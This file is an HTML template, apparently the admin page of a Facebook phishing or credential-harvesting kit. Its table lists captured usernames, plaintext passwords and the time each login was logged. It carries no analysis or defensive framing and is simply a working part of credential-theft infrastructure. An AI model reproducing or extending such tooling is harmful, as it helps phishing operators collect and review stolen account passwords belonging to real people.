<!DOCTYPE html>
<html>
	<head>
		<title>Facebook Credentials Dashboard</title>

		<style>
			#root {
				width: 100%;
				font-family: sans-serif;
			}

			table, th, td {
				border: 1px solid black;
				margin: 0 auto;
			}

			thead {
				font-weight: bold;
			}

			td {
				width: 20%;
				padding: 5px;
			}
		</style>
	</head>

	<body>
		<div id="root">
			<table>
				<thead>
					<tr>
						<td>Username</td>
						<td>Password</td>
						<td>Timestamp</td>
					</tr>
				</thead>

				<tbody>
					{% for cred in credentials %}
						<tr>
							<td>{{ cred.username }}</td>
							<td>{{ cred.password }}</td>
							<td>{{ cred.logged_timestamp }}</td>
						</tr>
					{% endfor %}
				</tbody>
			</table>
		</div>
	</body>
</html>
